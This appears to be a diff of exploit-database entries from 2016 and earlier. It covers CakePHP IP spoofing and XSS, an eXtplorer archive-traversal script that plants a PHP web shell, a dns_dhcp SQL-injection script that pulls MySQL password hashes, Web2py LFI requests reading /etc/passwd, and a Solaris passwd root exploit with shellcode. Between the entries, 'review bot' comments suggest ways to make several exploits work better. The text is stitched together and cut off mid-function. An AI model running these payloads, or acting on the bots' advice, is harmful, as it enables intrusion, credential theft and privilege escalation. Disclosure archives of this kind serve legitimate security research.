use Cake\Error\Debugger;
use Cake\Network\Exception\NotFoundException;
$this->layout = false;
if (!Configure::read('debug')):
throw new NotFoundException();
endif;
$cakeDescription = 'CakePHP: the rapid development php framework';
echo "PoC \n<br> Your IP is: [". $this->request->clientIp() ."]\n\n<br><br>";
[...]
?>
----------------------------------------------
If we send the following request with CLIENT-IP header containing an arbitrary
IP and malicious XSS data:
GET /cake/cake3/ HTTP/1.1
Host: centos
CLIENT-IP: 100.200.300.400 <script>alert('poc');</script>
Content-Length: 2
the application will give the following response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
PoC
<br> Your IP is: [100.200.300.400 <script>alert('poc');</script>]
[...]
As we can see the clientIp() method returns the fake IP and XSS payload
from CLIENT-IP header.
B) Croogo CMS exploit
An example application vulnerable to this bug is Croogo CMS:
https://croogo.org/
"Croogo is a free, open source, content management system for PHP,
released under The MIT License. It is powered by CakePHP MVC framework.
It was first released on October 07, 2009"
In one of its scripts we can find the isWhitelistedRequest() which
takes care of ACLs:
-------[ Vendor/croogo/croogo/Croogo/Lib/CroogoRouter.php ]--------
/**
* Check wether request is from a whitelisted IP address
*
* @see CakeRequest::addDetector()
* @param $request CakeRequest Request object
* @return boolean True when request is from a whitelisted IP Address
*/
public static function isWhitelistedRequest(CakeRequest $request) {
if (!$request) {
return false;
}
$clientIp = $request->clientIp();
$whitelist = array_map(
'trim',
(array)explode(',', Configure::read('Site.ipWhitelist'))
);
return in_array($clientIp, $whitelist);
}
-------------------------------------------------------------------
As we can see, it uses the affected clientIp() function from CakePHP framework.
VI. BUSINESS IMPACT
-------------------------
This vulnerability could be used to bypass access control lists to get
access to sensitive data, or lead to higher severity vulnerabilities
if untrusted data returned by clientIp() method is treated as safe and used
without appropriate sanitization within SQL queries, system command calls etc.
VII. SYSTEMS AFFECTED
-------------------------
According to the vendor, the following versions of CakePHP framework should be
affected by this issue.
3.1.11
3.2.4
2.8.1
2.7.10
2.6.12
VIII. SOLUTION
-------------------------
The vendor has released patched versions.
Install the latest version from the link below.
IX. REFERENCES
-------------------------
http://legalhackers.com
http://legalhackers.com/advisories/CakePHP-IP-Spoofing-Vulnerability.txt
Vendor security CakePHP releases:
http://bakery.cakephp.org/2016/03/13/cakephp_2613_2711_282_3017_3112_325_released.html
http://book.cakephp.org/3.0/en/controllers/request-response.html#working-with-http-methods-headers
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. REVISION HISTORY
-------------------------
12.05.2016 - Final advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
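Review bot: section IV understates the bug. Both `clientIp()` listings end with an unconditional block, `if (env('HTTP_CLIENTADDRESS')) { ... $ipaddr = preg_replace('/(?:,.*)/', '', $tmpipaddr); }`, that runs after the safe/trustProxy branch and overwrites whatever was chosen there, REMOTE_ADDR included. So a `ClientAddress:` request header (CGI maps `ClientAddress` to `HTTP_CLIENTADDRESS`; a hyphenated `Client-Address` would become `HTTP_CLIENT_ADDRESS` and not match) is a second spoofing path that works even where `Client-IP` is stripped by a front-end proxy, and it takes precedence over `Client-IP`. The PoC in V should send both headers, and VIII should state whether the vendor fix gates both behind the proxy flag rather than only `HTTP_CLIENT_IP`. Three smaller points. First, the `<script>` in the PoC response is a property of the home.ctp snippet echoing the value without `h()`, not of `clientIp()`; the advisory's real impact is the ACL bypass shown with Croogo, where `in_array($clientIp, $whitelist)` is an exact string comparison, so an attacker simply sends a whitelisted address verbatim. Second, VIII says "install the latest version" while the bakery URL in IX already names the fixed releases (2.6.13, 2.7.11, 2.8.2, 3.0.17, 3.1.12, 3.2.5); list them, and note that 3.0.17 implies the 3.0 branch is affected although VII omits it. Third, typos and leftovers: "trustyProxy" in IV should be `trustProxy` as in the code, "The is slightly different" is missing a word, the bare version list under the title in section I duplicates VII, and the sample GET carries a `Content-Length: 2` with no body.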

platforms/php/webapps/39816.php Executable file

@ -0,0 +1,134 @@
/*
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/EXTPLORER-ARCHIVE-PATH-TRAVERSAL.txt
[+] ISR: apparitionsec
Vendor:
==============
extplorer.net
Product:
==================
eXtplorer v2.1.9
eXtplorer is a PHP and Javascript-based File Manager, it allows to browse
directories, edit, copy, move, delete,
search, upload and download files, create & extract archives, create new
files and directories, change file
permissions (chmod) and more. It is often used as FTP extension for popular
applications like Joomla.
Vulnerability Type:
======================
Archive Path Traversal
CVE Reference:
==============
CVE-2016-4313
Vulnerability Details:
=====================
eXtplorer unzip/extract feature allows for path traversal as decompressed
files can be placed outside of the intended target directory,
if the archive content contains "../" characters. This can result in files
like ".htaccess" being overwritten or RCE / back door
exploits.
Tested on Windows
Reproduction steps:
==================
1) Generate an archive using below PHP script
2) Upload it to eXtplorer and then extract it
3) Check directory for the default 'RCE.php' file or use CL switch to
overwrite files like .htaccess
Exploit code(s):
===============
Run below PHP script from CL...
[evil-archive.php]
*/
<?php
if($argc<4){echo "Usage: <zip name>, <path depth>, <RCE.php as default?
Y/[file]>";exit();}
$zipname=$argv[1];
$exploit_file="RCE.php";
$cmd='<?php exec($_GET["cmd"]); ?>';
if(!empty($argv[2])&&is_numeric($argv[2])){
$depth=$argv[2];
}else{
echo "Second flag <path depth> must be numeric!, you supplied '$argv[2]'";
exit();
}
if(strtolower($argv[3])!="y"){
if(!empty($argv[3])){
$exploit_file=$argv[3];
}
if(!empty($argv[4])){
$cmd=$argv[4];
}else{
echo "Usage: enter a payload for file $exploit_file wrapped in double
quotes";
exit();
}
}
$zip = new ZipArchive();
$res = $zip->open("$zipname.zip", ZipArchive::CREATE);
$zip->addFromString(str_repeat("..\\", $depth).$exploit_file, $cmd);
$zip->close();
echo "\r\nExploit archive $zipname.zip created using $exploit_file\r\n";
echo "================ by hyp3rlinx ===================";
?>
/*
///////////////////////////////////////////////////////////////////////
[Script examples]
Use default RCE.php by passing "y" flag creating DOOM.zip with path depth
of 2 levels
c:\>php evil-archive.php DOOM 2 Y
Create DOOM.zip with path depth of 4 levels and .htaccess file to overwrite
one on the system.
c:\>php evil-archive.php DOOM 4 .htaccess "allow from all"
Disclosure Timeline:
===================================
Vendor Notification: No reply
May 14, 2016 : Public Disclosure
Exploitation Method:
======================
Local
Severity Level:
================
Medium 6.3
CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information.
hyp3rlinx
*/
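Review bot: the traversal prefix is built with `str_repeat("..\\", $depth)`, a backslash separator, which is why the header says "Tested on Windows"; on a Linux host the extractor will create a literal file named `..\..\RCE.php` inside the target directory and the overwrite never happens. Take the separator as an argument (or default to `../`, which Windows also honours) so the archive works against the Linux installs where eXtplorer is more commonly deployed as a Joomla extension. Three further points. The default payload `<?php exec($_GET["cmd"]); ?>` discards command output (`exec()` only returns the last line and nothing echoes it), so the dropped file is a blind shell; `system()` or `echo shell_exec(...)` is what the "check directory for RCE.php" step implies. The severity block labels the method "Local" and scores `AV:L`, but the reproduction is an upload through the web UI by an authenticated user, which is network-reachable; `AV:N` with the appropriate PR value is the consistent choice, and the vector should match the "Exploitation Method" line. Finally, the usage string only documents three arguments although the script requires a fourth (the payload) whenever the third is a filename rather than `Y`.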

platforms/php/webapps/39817.php Executable file

@ -0,0 +1,150 @@
/*
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DNS_DHCP-WEB-INTERFACE-SQL-INJECTION.txt
[+] ISR: apparitionsec
Vendor:
====================
tmcdos / sourceforge
Product:
======================
dns_dhcp Web Interface
Download: sourceforge.net/projects/dnsmasq-mikrotik-admin/?source=directory
This is a very simple web interface for management of static DHCP leases in
DNSmasq and Mikrotik.
It generates config files for DNSmasq and uses RouterOS API to manage
Mikrotik. Network devices (usually PCs)
are separated into subnets by department and use triplets (hostname, MAC
address, IP address) for identification.
Information is stored in MySQL.
Vulnerability Type:
===================
SQL Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
The 'net' HTTP form POST parameter to dns.php script is not
checked/santized and is used directly in MySQL query allowing
attacker to easily exfiltrate any data from the backend database by using
SQL Injection exploits.
1) On line 239 of dns.php
$b = str_replace('{FIRMA}',a_select('SUBNET',$_REQUEST['net']),$b);
2)
dns.php line 187 the a_select function where 2nd argument $_REQUEST['net']
is passed to an concatenated to query ($clause)
and executed on line 194 mysql_query($query).
function a_select($tbl,$clause,$field='',$where='')
{
if ($clause==0) return '&#160;';
if($field=='') $field=$tbl;
$query = "SELECT $field FROM $tbl WHERE ";
if($where=='') $query.='ID='.$clause;
else $query.=$where;
$res = mysql_query($query) or
trigger_error($query.'<br>'.mysql_error(),E_USER_ERROR);
if(mysql_num_rows($res)>0) return mysql_result($res,0,0);
else return '&#160;';
}
Exploit code(s):
===============
Run from CL...
*/
<?php
#dns_dhcp SQL Injection Exploit
#exfiltrates host, user and password from MySQL
#by hyp3rlinx
#ISR - apparitionsec
#hyp3rlinx.altervista.org
#========================
$victim="localhost";
$url="/dns_dhcp/dns/dns.php";
$port=80;
$r='';
$s = fsockopen($victim, $port, $errno, $errstr, 30);
if(!$s){echo "Cant connect to the fucking server!"; exit();}
$sql="net=1 and (select 1 from(select count(*),concat((select (select
concat(0x2b,host,0x2b,user,0x2b,password,0x2b)) from mysql.user limit
1),floor(rand(0)*2))x from mysql.user group by x)a)";
$out = "POST $url HTTP/1.1\r\n";
$out .= "Host: $victim\r\n";
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
$out .= 'Content-Length: ' . strlen($sql) . "\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($s, $out);
fwrite($s, $sql);
while (!feof($s)) {
$r .= fgets($s, 128);
if(strpos($r,'Duplicate entry')!==FALSE){
$idx=strpos($r,'Duplicate entry');
echo substr($r,$idx);
break;
}
}
fclose($s);
/*
Example result:
Duplicate entry
'+localhost+root+*6691484EA6B50DDDE1926A220DA01FA9E575C18A+1' for key
'group_key'
*/
?>
/*
Disclosure Timeline:
===============================
Vendor Notification: NA
May 14, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
Description:
==================================================
Request Method(s): [+] POST
Vulnerable Product: [+] dns_dhcp Web Interface
Vulnerable Parameter(s): [+] 'net'
=====================================================
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
*/
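Review bot: the exploit depends entirely on the application echoing the database error to the client, which the quoted `a_select()` does via `trigger_error($query.'<br>'.mysql_error(),E_USER_ERROR)` but only when PHP's display_errors is on; with errors going to the log, the read loop just drains the response to EOF and the script exits printing nothing. Report "no 'Duplicate entry' in response" in that case instead of failing silently, and document the display_errors precondition in the advisory. Second, the payload selects `host`, `user` and `password` from `mysql.user`, which assumes the web application's DB account has SELECT on the `mysql` schema and that a `password` column exists there; the same `count(*) ... group by floor(rand(0)*2)` error-based technique works against any table the account can read, so taking the table and columns as parameters would make the script useful where that assumption fails (the application's own tables are a better first target). Third, `$victim` and `$url` are hard-coded, and the body is sent without URL encoding: the author sidesteps `+` by writing `0x2b`, but spaces and parentheses go out literally, which PHP tolerates and an intermediate proxy may not. Note also that `if ($clause==0) return '&#160;';` in `a_select()` is not a guard against this: a string beginning with `1 and ...` compares as 1, so the only real fix is an integer cast or a prepared statement.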


@ -0,0 +1,104 @@
Title - Web2py 2.14.5 Multiple Vulnerabilities LFI,XSS,CSRF
# Exploit Title : Web2py 2.14.5 Multiple Vulnerabilities LFI, XSS,CSRF
# Reported Date : 2-April-2016
# Fixed Date : 4-April-2016
# Exploit Author : Narendra Bhati - https://www.exploit-db.com/author/?a=7638
# CVE ID : LFI - CVE-2016-4806 , Reflected XSS - CVE-2016-4807 , CSRF - CVE-2016-4808
# Tested On : MAC OS X EI Capitan, Windows 7 64 Bit, Most Linux Platforms.
# Fix/Patching : Update To Web2py. 2.14.6
# Facebook : https://facebook.com/iambhati
# Twitter : http://twitter.com/NarendraBhatiB
# Detailed POC: http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
==============================================
LFI(Local File Inclusion): CVE-2016-4806
POST URI - /admin/default/pack_custom/[applicationmame]
Vulnerable Parameter = file
Exploit - file=/etc/passwd
Authentication Required = Yes(Administrator)
Steps To Reproduction
1) HTTP Request
POST /admin/default/pack_custom/[applicationname] HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/admin/default/pack_custom/dasdasdasdad
Cookie: session_id_welcome=asdadasdasdasdasd; session_id_admin=asdasdasdasdasd
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 3213
file=/etc/passwd
2) After sending this request, Application will prompt you with a file to download as an extension of "w2p".
3) Now we have to unpack this downloaded file using. https://github.com/pigeonflight/web2py-unpacker
I.e.
Command for unpacking w2p file
python web2py-unpacker.py downloadfile.w2p
4) This command will create a folder called "unpack", In this folder there will be an another folder of the application of web2py. In this folder you will found the etc folder, Then into this folder you will get the passwd file.
Video POC - https://www.youtube.com/watch?v=paCvmHgomP4
Full Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
========================================================================
Reflected XSS(Cross Site Scripting) : CVE-2016-4807
GET URI - http://127.0.0.1:8000/admin/default/install_plugin/dasdasdasdad?plugin=math2py&source=anyurl
Vulnerable Parameter - source
Exploit - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1)
Authentication Required - Yes(Administrator)
Steps To Reproduction
1) Go to this URL - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1)
2) The parameter "source" value will get reflected on the page on "Here" button.
3) When you will click on that button "Here" XSS payload will get executed.
Video POC - https://www.youtube.com/watch?v=4j9hXJtVNbk
Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
============================================================================
CSRF(Cross Site Request Forgery): CVE-2016-4808
GET URI - http://127.0.0.1:8000/admin/default/enable/[applicationname]
Exploit - http://127.0.0.1:8000/admin/default/enable/[applicationname]
Authenticated Required - Yes(Administrator)
Steps To Reproduction
1) Suppose we have an application in web2py called "testingapp"
2) An attacker can trick an victim to disable the installed application just By sending this URL to victim - http://127.0.0.1:8000/admin/default/enable/testingapp
Video POC - https://www.youtube.com/watch?v=d4V8qlNrYtk
Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
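Review bot: the CSRF section is internally inconsistent: step 2 says the victim is tricked into "disable the installed application", but the URI used is `/admin/default/enable/[applicationname]`; state which action the endpoint performs, since both the impact description and the expected fix (a CSRF token on a state-changing request) depend on it. In the LFI request, `Content-Length: 3213` does not match the single-line body `file=/etc/passwd`, so the request as written does not describe what was actually sent; the header should reflect the real body length. Minor: `Authenticated Required` should read `Authentication Required`, matching the other two sections.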


@ -1,574 +0,0 @@
source: http://www.securityfocus.com/bid/9757/info
Sun has reported an unspecified vulnerability in the passwd utility on Solaris that may permit local attackers to gain unauthorized root privileges.
/*
* $Id: raptor_passwd.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9
* Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Unknown vulnerability in passwd(1) in Solaris 8.0 and 9.0 allows local users
* to gain privileges via unknown attack vectors (CAN-2004-0360).
*
* "Those of you lucky enough to have your lives, take them with you. However,
* leave the limbs you've lost. They belong to me now." -- Beatrix Kidd0
*
* This exploit uses the ret-into-ld.so technique, to effectively bypass the
* non-executable stack protection (noexec_user_stack=1 in /etc/system). The
* exploitation wasn't so straight-forward: sending parameters to passwd(1)
* is somewhat tricky, standard ret-into-stack doesn't seem to work properly
* for some reason (damn SEGV_ACCERR), and we need to bypass a lot of memory
* references before reaching ret. Many thanks to Inode <inode@deadlocks.info>.
*
* Usage:
* $ gcc raptor_passwd.c -o raptor_passwd -ldl -Wall
* $ ./raptor_passwd <current password>
* [...]
* # id
* uid=0(root) gid=1(other) egid=3(sys)
* #
*
* Vulnerable platforms:
* Solaris 8 with 108993-14 through 108993-31 and without 108993-32 [tested]
* Solaris 9 without 113476-11 [tested]
*/
#include <ctype.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <stropts.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_passwd.c - passwd circ() local, Solaris/SPARC 8/9"
#define INFO2 "Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/bin/passwd" // target vulnerable program
#define BUFSIZE 256 // size of the evil buffer
#define VARSIZE 1024 // size of the evil env var
#define FFSIZE 64 + 1 // size of the fake frame
#define DUMMY 0xdeadbeef // dummy memory address
#define CMD "id;uname -a;uptime;\n" // execute upon exploitation
/* voodoo macros */
#define VOODOO32(_,__,___) {_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define VOODOO64(_,__,___) {_+=7-(_+(__+___+1)*4+3)%8;}
char sc[] = /* Solaris/SPARC shellcode (12 + 48 = 60 bytes) */
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
/* globals */
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_addr(int addr, char *pattern);
int find_pts(char **slave);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
void shell(int fd);
int read_prompt(int fd, char *buf, int size);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], var[VARSIZE], ff[FFSIZE];
char platform[256], release[256], cur_pass[256], tmp[256];
int i, offset, ff_addr, sc_addr, var_addr;
int plat_len, prog_len, rel;
char *arg[2] = {"foo", NULL};
int arg_len = 4, arg_pos = 1;
int pid, cfd, newpts;
char *newpts_str;
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
int ret = search_ldso("strcpy");
int rwx_mem = search_rwx_mem();
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s current_pass\n\n", argv[0]);
exit(1);
}
sprintf(cur_pass, "%s\n", argv[1]);
/* get some system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
rel = atoi(release + 2);
/* prepare the evil buffer */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
buf[sizeof(buf) - 2] = '\n';
/* prepare the evil env var */
memset(var, 'B', sizeof(var));
var[sizeof(var) - 1] = 0x0;
/* prepare the fake frame */
bzero(ff, sizeof(ff));
/*
* saved %l registers
*/
set_val(ff, i = 0, DUMMY); /* %l0 */
set_val(ff, i += 4, DUMMY); /* %l1 */
set_val(ff, i += 4, DUMMY); /* %l2 */
set_val(ff, i += 4, DUMMY); /* %l3 */
set_val(ff, i += 4, DUMMY); /* %l4 */
set_val(ff, i += 4, DUMMY); /* %l5 */
set_val(ff, i += 4, DUMMY); /* %l6 */
set_val(ff, i += 4, DUMMY); /* %l7 */
/*
* saved %i registers
*/
set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to strcpy() */
set_val(ff, i += 4, 0x42424242); /* %i1: 2nd arg to strcpy() */
set_val(ff, i += 4, DUMMY); /* %i2 */
set_val(ff, i += 4, DUMMY); /* %i3 */
set_val(ff, i += 4, DUMMY); /* %i4 */
set_val(ff, i += 4, DUMMY); /* %i5 */
set_val(ff, i += 4, sb - 1000); /* %i6: frame pointer */
set_val(ff, i += 4, rwx_mem - 8); /* %i7: return address */
/* fill the envp, keeping padding */
ff_addr = add_env(var); /* var must be before ff! */
sc_addr = add_env(ff);
add_env(sc);
add_env(NULL);
/* calculate the offset to argv[0] (voodoo magic) */
plat_len = strlen(platform) + 1;
prog_len = strlen(VULN) + 1;
offset = arg_len + env_len + plat_len + prog_len;
if (rel > 7)
VOODOO64(offset, arg_pos, env_pos)
else
VOODOO32(offset, plat_len, prog_len)
/* calculate the needed addresses */
var_addr = sb - offset + arg_len;
ff_addr += var_addr;
sc_addr += var_addr;
/* set fake frame's %i1 */
set_val(ff, 36, sc_addr); /* 2nd arg to strcpy() */
/* check the addresses */
check_addr(var_addr, "var_addr");
check_addr(ff_addr, "ff_addr");
/* fill the evil buffer */
for (i = 0; i < BUFSIZE - 4; i += 4)
set_val(buf, i, var_addr);
/* may need to bruteforce the distance here */
set_val(buf, 112, ff_addr);
set_val(buf, 116, ret - 4); /* strcpy(), after the save */
/* fill the evil env var */
for (i = 0; i < VARSIZE - 4; i += 4)
set_val(var, i, var_addr);
set_val(var, 0, 0xffffffff); /* first byte must be 0xff! */
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using var address\t: 0x%p\n", (void *)var_addr);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using ff address\t: 0x%p\n", (void *)ff_addr);
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
/* find a free pts */
cfd = find_pts(&newpts_str);
/* fork() a new process */
if ((pid = fork()) < 0) {
perror("fork");
exit(1);
}
/* parent process */
if (pid) {
sleep(1);
/* wait for password prompt */
if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) {
fprintf(stderr, "Error: timeout waiting for prompt\n");
exit(1);
}
if (!strstr(tmp, "ssword: ")) {
fprintf(stderr, "Error: wrong prompt received\n");
exit(1);
}
/* send the current password */
write(cfd, cur_pass, strlen(cur_pass));
usleep(500000);
/* wait for password prompt */
if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) {
fprintf(stderr, "Error: timeout waiting for prompt\n");
exit(1);
}
if (!strstr(tmp, "ssword: ")) {
fprintf(stderr, "Error: wrong current_pass?\n");
exit(1);
}
/* send the evil buffer */
write(cfd, buf, strlen(buf));
usleep(500000);
/* got root? */
if (read_prompt(cfd, tmp, sizeof(tmp)) < 0) {
fprintf(stderr, "Error: timeout waiting for shell\n");
exit(1);
}
if (strstr(tmp, "ssword: ")) {
fprintf(stderr, "Error: not vulnerable\n");
exit(1);
}
if (!strstr(tmp, "# ")) {
fprintf(stderr, "Something went wrong...\n");
exit(1);
}
/* semi-interactive shell */
shell(cfd);
/* child process */
} else {
/* start new session and get rid of controlling terminal */
if (setsid() < 0) {
perror("setsid");
exit(1);
}
/* open the new pts */
if ((newpts = open(newpts_str, O_RDWR)) < 0) {
perror("open");
exit(1);
}
/* ninja terminal emulation */
ioctl(newpts, I_PUSH, "ptem");
ioctl(newpts, I_PUSH, "ldterm");
/* close the child fd */
close(cfd);
/* duplicate stdin */
if (dup2(newpts, 0) != 0) {
perror("dup2");
exit(1);
}
/* duplicate stdout */
if (dup2(newpts, 1) != 1) {
perror("dup2");
exit(1);
}
/* duplicate stderr */
if (dup2(newpts, 2) != 2) {
perror("dup2");
exit(1);
}
/* close the new pts */
if (newpts > 2)
close(newpts);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
}
exit(0);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return(env_len);
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return(env_len);
}
/*
* check_addr(): check an address for 0x00, 0x04, 0x0a, 0x0d or 0x61-0x7a bytes
*/
void check_addr(int addr, char *pattern)
{
/* check for NULL byte (0x00) */
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
exit(1);
}
/* check for EOT byte (0x04) */
if (((addr & 0xff) == 0x04) || ((addr & 0xff00) == 0x0400) ||
((addr & 0xff0000) == 0x040000) ||
((addr & 0xff000000) == 0x04000000)) {
fprintf(stderr, "Error: %s contains a 0x04!\n", pattern);
exit(1);
}
/* check for NL byte (0x0a) */
if (((addr & 0xff) == 0x0a) || ((addr & 0xff00) == 0x0a00) ||
((addr & 0xff0000) == 0x0a0000) ||
((addr & 0xff000000) == 0x0a000000)) {
fprintf(stderr, "Error: %s contains a 0x0a!\n", pattern);
exit(1);
}
/* check for CR byte (0x0d) */
if (((addr & 0xff) == 0x0d) || ((addr & 0xff00) == 0x0d00) ||
((addr & 0xff0000) == 0x0d0000) ||
((addr & 0xff000000) == 0x0d000000)) {
fprintf(stderr, "Error: %s contains a 0x0d!\n", pattern);
exit(1);
}
/* check for lowercase chars (0x61-0x7a) */
if ((islower(addr & 0xff)) || (islower((addr & 0xff00) >> 8)) ||
(islower((addr & 0xff0000) >> 16)) ||
(islower((addr & 0xff000000) >> 24))) {
fprintf(stderr, "Error: %s contains a 0x61-0x7a!\n", pattern);
exit(1);
}
}
/*
* find_pts(): find a free slave pseudo-tty
*/
int find_pts(char **slave)
{
int master;
extern char *ptsname();
/* open master pseudo-tty device and get new slave pseudo-tty */
if ((master = open("/dev/ptmx", O_RDWR)) > 0) {
grantpt(master);
unlockpt(master);
*slave = ptsname(master);
return(master);
}
return(-1);
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
check_addr(addr - 4, sym);
return(addr);
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address NULL bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return(addr_old);
}
/*
* set_val(): copy a dword inside a buffer
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0xff000000) >> 24;
buf[pos + 1] = (val & 0x00ff0000) >> 16;
buf[pos + 2] = (val & 0x0000ff00) >> 8;
buf[pos + 3] = (val & 0x000000ff);
}
/*
* shell(): semi-interactive shell hack
*/
void shell(int fd)
{
fd_set fds;
char tmp[128];
int n;
/* quote from kill bill: vol. 2 */
fprintf(stderr, "\"Pai Mei taught you the five point palm exploding heart technique?\" -- Bill\n");
fprintf(stderr, "\"Of course.\" -- Beatrix Kidd0, alias Black Mamba, alias The Bride (KB Vol2)\n\n");
/* execute auto commands */
write(1, "# ", 2);
write(fd, CMD, strlen(CMD));
/* semi-interactive shell */
for (;;) {
FD_ZERO(&fds);
FD_SET(fd, &fds);
FD_SET(0, &fds);
if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
perror("select");
break;
}
/* read from fd and write to stdout */
if (FD_ISSET(fd, &fds)) {
if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
fprintf(stderr, "Goodbye...\n");
break;
}
if (write(1, tmp, n) < 0) {
perror("write");
break;
}
}
/* read from stdin and write to fd */
if (FD_ISSET(0, &fds)) {
